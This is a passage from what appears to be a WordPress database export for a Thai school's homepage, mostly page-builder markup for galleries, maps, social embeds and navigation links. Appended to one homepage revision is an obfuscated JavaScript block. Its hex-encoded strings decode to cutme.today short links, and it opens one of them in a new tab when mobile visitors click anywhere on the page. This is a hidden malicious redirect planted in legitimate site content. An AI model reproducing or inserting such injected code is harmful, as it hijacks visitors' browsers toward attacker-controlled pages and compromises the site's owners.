alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1908,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://script.google.com/macros/s/AKfycbyfuu5DE6Sug1gTORaEw1XTMD3zj82GVkMIkPseb_e71HZWAqbrLMuADBmWcyARoaNa/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การลา-1.png\" alt=\"\" class=\"wp-image-1908\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2F61565350226486%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-09-11 14:46:05','2025-09-11 07:46:05','',14,'http://pakhaeng.ssk.in.th/?p=2047',0,'revision','',0),
(2049,1,'2025-09-11 15:01:28','2025-09-11 08:01:28','','สีส้ม สีน้ำเงิน ทางการ รับสมัครนักเรียน ป้าย แบนเนอร์ (3) (1) (1)','','inherit','','closed','','%e0%b8%aa%e0%b8%b5%e0%b8%aa%e0%b9%89%e0%b8%a1-%e0%b8%aa%e0%b8%b5%e0%b8%99%e0%b9%89%e0%b8%b3%e0%b9%80%e0%b8%87%e0%b8%b4%e0%b8%99-%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3-%e0%b8%a3-2','','','2025-09-11 15:01:28','2025-09-11 08:01:28','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-3-1-1.png',0,'attachment','image/png',0),
(2050,1,'2025-09-11 15:01:50','2025-09-11 08:01:50','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"9f7ee323\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1e35ff-0d\",\"thumbSize\":\"full\",\"ids\":[2039,2049],\"type\":\"slider\",\"imageRatio\":\"inherit\",\"gutter\":[26,\"\",\"\"],\"carouselHeight\":[600,\"\",\"\"],\"autoPlay\":true,\"transSpeed\":1240,\"imagesDynamic\":[{\"id\":2039,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=2039\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-scaled.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-scaled.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-scaled.png\",\"width\":2560,\"height\":1280},{\"id\":2049,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=2049\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-3-1-1-scaled.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-3-1-1-scaled.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-3-1-1-scaled.png\",\"width\":2560,\"height\":1280}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" 